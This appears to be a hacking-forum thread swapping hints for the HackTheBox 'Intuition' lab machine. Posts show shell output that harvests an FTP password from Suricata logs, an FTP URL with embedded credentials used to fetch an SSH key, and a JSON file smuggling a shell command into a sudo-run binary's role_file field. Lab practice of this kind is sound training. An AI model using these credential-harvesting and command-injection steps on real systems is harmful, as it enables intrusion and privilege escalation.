Apr 29, 2024, 04:26 AM
|
HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
|
(Apr 29, 2024, 04:54 AM)andlommy Wrote:(Apr 29, 2024, 04:52 AM)3kyy Wrote:i did it via a bit of guesswork from this line:(Apr 28, 2024, 12:48 PM)nomx1337 Wrote:(Apr 28, 2024, 12:47 PM)ticklemeelmo Wrote: Wait... What is the step after getting the Flask Secret Key?? I can grab all the other files but not blueprints but I think I can cat it out in the shell
Apr 29, 2024, 05:41 AM
(Apr 29, 2024, 05:36 AM)3kyy Wrote:(Apr 29, 2024, 02:27 AM)osamy7593 Wrote:(Apr 29, 2024, 02:23 AM)adminadmin1337 Wrote: Hint for user please! For the path those are just standard python grammar to import modules. For how to get the user name, it has been explained thoroughly in previous threads. You can go back and check
dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz
/var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:36.099184+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}} /var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:43:52.999165+0000","flow_id":1988487100549589,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":37522,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:SLaZvboBWDjwD/SXu/SOOcdHzV8=","ftp":{"command":"PASS","command_data":"Lopezzz1992%123","completion_code":["530"],"reply":["Authentication failed."],"reply_received":"yes"}} /var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:32.133372+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":1,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"USER","command_data":"lopez","completion_code":["331"],"reply":["Username ok, send password."],"reply_received":"yes"}} /var/log/suricata/eve.json.7.gz:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"192.168.227.229","src_port":45760,"dest_ip":"192.168.227.13","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}} pw: Lopezz1992%123 lopez@intuition:~$ ll total 20 drwxr-x--- 3 lopez lopez 4096 Apr 10 08:21 ./ drwxr-xr-x 5 root root 4096 Apr 25 11:32 ../ lrwxrwxrwx 1 root root 9 Apr 9 18:26 .bash_history -> /dev/null -rw-r--r-- 1 lopez lopez 3771 Oct 13 2023 .bashrc -rw-r--r-- 1 lopez lopez 807 Oct 13 2023 .profile drwx------ 2 lopez lopez 4096 Apr 10 08:21 .ssh/ lopez@intuition:~$ whoami lopez lopez@intuition:~$ id uid=1003(lopez) gid=1003(lopez) groups=1003(lopez),1004(sys-adm)
Apr 29, 2024, 06:03 AM
(Apr 29, 2024, 05:43 AM)adolfo Wrote: dev_acc@intuition:~$ zgrep -i lopez /var/log/suricata/*.gz woooooow I am I mad at myself, I saw suricata and thought that was important but just passed over that because.....plot? thx
Apr 29, 2024, 06:31 AM
I am in Lopez user where to go next help please !!!!
Apr 29, 2024, 06:42 AM
Apr 29, 2024, 07:02 AM
(Apr 29, 2024, 06:56 AM)3kyy Wrote:(Apr 29, 2024, 05:58 AM)andlommy Wrote:(Apr 29, 2024, 05:54 AM)3kyy Wrote:(Apr 29, 2024, 05:41 AM)mycatdante Wrote:(Apr 29, 2024, 05:36 AM)3kyy Wrote: I already managed to download the id_rsa, and I understand what you are saying, but my question is how did you know that the username is dev_acc? What enumeration did you do?ftp://ftp_admin:u3jai8y71s2@ftp.local/**.key Make sure you dont straight out copy the ssh key to id_rsa. Make sure -----END OPENSSH PRIVATE KEY----- is at the bottom of the file contents, had that error happen to me maybe that'll fix it.
Apr 29, 2024, 07:38 AM
i GOT THE USER NO CLUES FOR ROOT PLS HELP
Apr 29, 2024, 07:49 AM
lopez@intuition:~$ cat exploit.json
{ "action": "install", "role_file": "nonexistent.yml; touch /tmp/testfile #", "auth_code": "UHI75GHINKOP" } lopez@intuition:~$ sudo /opt/runner2/runner2 exploit.json Run key missing or invalid. lopez@intuition:~$ What am I doing wrong |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,778 |
9 hours ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,968 |
Yesterday, 09:54 AM Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 92,976 |
Yesterday, 08:48 AM Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,627 |
Yesterday, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,275 |
Apr 30, 2026, 02:10 PM Last Post: kkkato |
||